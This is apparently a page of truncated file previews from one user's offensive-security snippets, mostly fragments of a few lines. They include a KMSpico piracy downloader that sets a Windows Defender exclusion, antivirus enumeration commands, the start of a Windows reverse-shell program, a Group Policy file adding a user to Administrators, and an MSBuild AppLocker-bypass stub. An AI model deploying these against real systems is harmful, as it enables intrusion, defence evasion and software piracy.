braaaax

#!/bin/bash
# via ippsec

IFS=$'\n'
old_process=$(ps -eo command)

while true; do
  new_process=$(ps -eo command)
  diff <(echo "$old_process") <(echo "$new_process") |grep [\<\>]
  sleep 1

braaaax

#!/bin/bash

if ! [ $(id -u) = 0 ]
then
  echo "Run as root"
  exit 1
fi

if [ -e ~/.xmodmaprc ];then
  xmodmap ~/.xmodmaprc

braaaax

$KMSUrl = "https://codeload.github.com/charygao/KMSpico_v10.2.0/zip/master"
$KMSDst = "C:\windows\temp\KMSpico.zip"
$KMSUnzip = "C:\windows\temp\KMSPico"
$KMSExe = "C:\Windows\Temp\KMSPico\KMSpico_v10.2.0-master\KMSpico Portable\AutoPico.exe"

if ((Get-CimInstance -ClassName Win32_OperatingSystem).name -match "Windows 10" -or (Get-CimInstance -ClassName Win32_OperatingSystem).name -match  "Server 2016") {

Write-Host "Temporarily disabling Windows Defender Real time Scanning"
Set-MpPreference -ExclusionPath C:\temp\windows\

braaaax

Host Enumeration:

--- OS Specifics ---
wmic os LIST Full (* To obtain the OS Name, use the "caption" property)

wmic computersystem LIST full

--- Anti-Virus ---

wmic /namespace:\\root\securitycenter2 path antivirusproduct

braaaax

param(
    [Parameter(Mandatory)]
    [string]$Path
)

#Created by Pierre.Audonnet@microsoft.com
#
#Got keytab structure from http://www.ioplex.com/utilities/keytab.txt
#
#  keytab {

braaaax

/* compile: i686-w64-mingw32-gcc -o brax.exe reverse.c -lws2_32 */

#include <winsock2.h>
#include <stdio.h>

#pragma comment(lib, "w2_32")

WSADATA wsaData;
SOCKET Winsock;
SOCKET Sock;

braaaax

<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><Group clsid="{6D4A79E4-529C-4481-ABD0-F5BD7EA93BA7}" name="Administrators (built-in)" image="2" changed="2019-03-07 17:32:24" uid="{ECC42B3A-5D61-4705-BC17-467C4A2764DE}"><Properties action="U" newName="" description="GPP - admins" deleteAllUsers="0" deleteAllGroups="0" removeAccounts="0" groupSid="S-1-5-32-544" groupName="Administrators (built-in)"><Members><Member name="lab\chry" action="ADD" sid="S-1-5-21-1805218588-1302490888-793887298-1113"/></Members></Properties></Group>
	<Group clsid="{6D4A79E4-529C-4481-ABD0-F5BD7EA93BA7}" name="Remote Desktop Users (built-in)" image="2" changed="2019-03-07 17:33:38" uid="{5F8E65C1-F1BA-4207-8549-5D6606F8E7DF}"><Properties action="U" newName="" description="gpp - add chry rdp" deleteAllUsers="0" deleteAllGroups="0" removeAccounts="0" groupSid="S-1-5-32-555" groupName="Remote Desktop Users (built-in)"><Members><Member name="lab\chry" action="ADD" sid="S-1-5-21-1805218588-130

braaaax

<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 <Target Name="Hello">
 <ClassExample />
 </Target>
 <UsingTask
 TaskName="ClassExample"
 TaskFactory="CodeTaskFactory"
 AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
 <Task>
 

braaaax

# AppLocker Bypass Checker (Default Rules) v2.0
#
# One of the Default Rules in AppLocker allows everything in the folder C:\Windows to be executed.
# A normal user shouln't have write permission in that folder, but that is not always the case.
# This script lists default ACL for the "BUILTIN\users" group looking for write/createFiles & execute authorizations
#
# @Author: Sparc Flow in "How to Hack a Fashion Brand"
#
# NOTE: change the group and root_folder variables to suit your needs

braaaax

package main                                                                                                                                                                                                     
                                                                                                                                                                                                                 
import (                                                                                                                                                                                                         
        "bufio"                                                                                                                                                                                                  
        "bytes"